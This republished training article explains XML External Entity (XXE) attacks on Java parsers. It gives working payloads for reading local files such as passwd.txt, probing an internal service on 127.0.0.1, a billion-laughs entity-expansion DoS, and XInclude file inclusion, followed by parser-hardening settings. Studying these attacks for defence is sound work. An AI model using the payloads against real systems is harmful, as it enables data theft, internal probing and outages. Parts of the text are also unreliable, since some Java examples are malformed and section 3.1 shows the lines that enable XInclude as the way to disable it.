How XML External Entity (XXE) Attacks Exploit DTDs and How to Defend Them

This article explains fundamental XML concepts, DTD and entity definitions, demonstrates common XXE attack scenarios such as file reading, internal network probing, DoS and XInclude exploitation with Java code examples, and provides practical security hardening techniques including disabling XInclude, DTD parsing, and external entity resolution.

MaGe Linux Operations
MaGe Linux Operations
MaGe Linux Operations
How XML External Entity (XXE) Attacks Exploit DTDs and How to Defend Them

1 Basic Concepts

XML (Extensible Markup Language) is a plain‑text markup language designed for data transmission rather than presentation and is a W3C recommendation.

XML tags are user‑defined; an example XML document may contain title, sender, receiver and content elements.

DTD (Document Type Definition) defines the allowed structure of an XML document, including root element, ELEMENT, ATTLIST and ENTITY declarations.

Example DTD declaration: <!DOCTYPE RootElementName [DTD content]> specifies that the XML file must have a root element persons with child elements person and their attributes.

External DTD can be referenced with <!DOCTYPE RootElementName SYSTEM "DTDFileName">.

Entity definitions allow reuse of values. Example: <!ENTITY entityName "entity value"> and can be referenced in the document as &entityName;.

Entities are classified as parameter vs non‑parameter and internal vs external. Non‑parameter entities can be used both in DTD and document content, while parameter entities are only usable inside DTD. Internal entities define the value directly; external entities obtain the value from a file or URL.

XML External Entity (XXE) Injection

XXE occurs when an XML parser processes external entities and the supplied XML can be controlled by an attacker, leading to information disclosure, command execution, denial‑of‑service, SSRF, internal port scanning, etc.

2 Common Attack Scenarios

2.1 Server File Read (Information Disclosure)

Payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ELEMENT root (#PCDATA)>
    <!ENTITY pw SYSTEM "file:///D:/securetest/xxe/passwd.txt">
]>
<root>&pw;</root>

Java code that parses the payload:

public static void main(String[] args) throws Exception {
    String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
" +
                 "<!DOCTYPE root [
" +
                 "\t<!ELEMENT root (#PCDATA)>
" +
                 "\t<!ENTITY pw SYSTEM \"file:///D:/securetest/xxe/passwd.txt\">]>>
" +
                 "<root>&pw;</root>";
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    factory.setValidating(true);
    DocumentBuilder builder = factory.newDocumentBuilder();
    InputStream in = new ByteArrayInputStream(xml.getBytes());
    org.w3c.dom.Document document = builder.parse(in);
    Element rootElement = document.getDocumentElement();
    System.out.println("Root name: " + rootElement.getNodeName());
    System.out.println("Root content: " + rootElement.getTextContent());
}

The result prints the contents of passwd.txt.

2.2 Internal Network Probing

Payload uses an external entity that points to an internal HTTP service:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ELEMENT root (#PCDATA)>
    <!ENTITY pw SYSTEM "http://127.0.0.1:3000/getInnerData">
]>
<root>&pw;</root>

Corresponding Java parsing code is similar to the previous example, and the output shows the response from the internal endpoint.

2.3 XML‑Based DoS (Entity Expansion)

Payload defines recursively expanding entities to cause exponential growth:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
    <!ELEMENT root (#PCDATA)>
    <!ENTITY lol "lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol
">
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;">
]>
<root>&lol6;</root>

Java code parses the document with entity expansion disabled or limited; without limits the parser consumes massive memory and CPU, demonstrating a DoS effect.

2.4 XInclude Exploitation

Even when DTD is disabled, enabling XInclude can allow inclusion of external files:

<?xml version="1.0" encoding="UTF-8"?>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
    <xi:include href="file:///D:/securetest/xxe/passwd.txt" parse="text"/>
</root>

Java parser configuration:

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setNamespaceAware(true);
factory.setXIncludeAware(true);

Parsing this XML prints the contents of the included file.

3 Secure Coding Practices

3.1 Disable XInclude

Do not enable XInclude in XML parsers; if it must be used, set

factory.setNamespaceAware(true); factory.setXIncludeAware(true);

only when necessary.

3.2 Disable DTD Parsing

When DTD is not required, disable it completely, e.g.:

factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

3.3 Disable External Entity Resolution

Either disable external entities globally:

factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

or provide a custom EntityResolver that returns an empty source:

builder.setEntityResolver(new EntityResolver() {
    @Override
    public InputSource resolveEntity(String publicId, String systemId) {
        return new InputSource(new StringReader(""));
    }
});

4 Automated Security Scanning

IoT platforms integrate these XML security rules into automated pipelines to ensure production services are protected.

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

javasecurityXMLDTDEntity ExpansionXIncludeXXE
MaGe Linux Operations
Written by

MaGe Linux Operations

Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.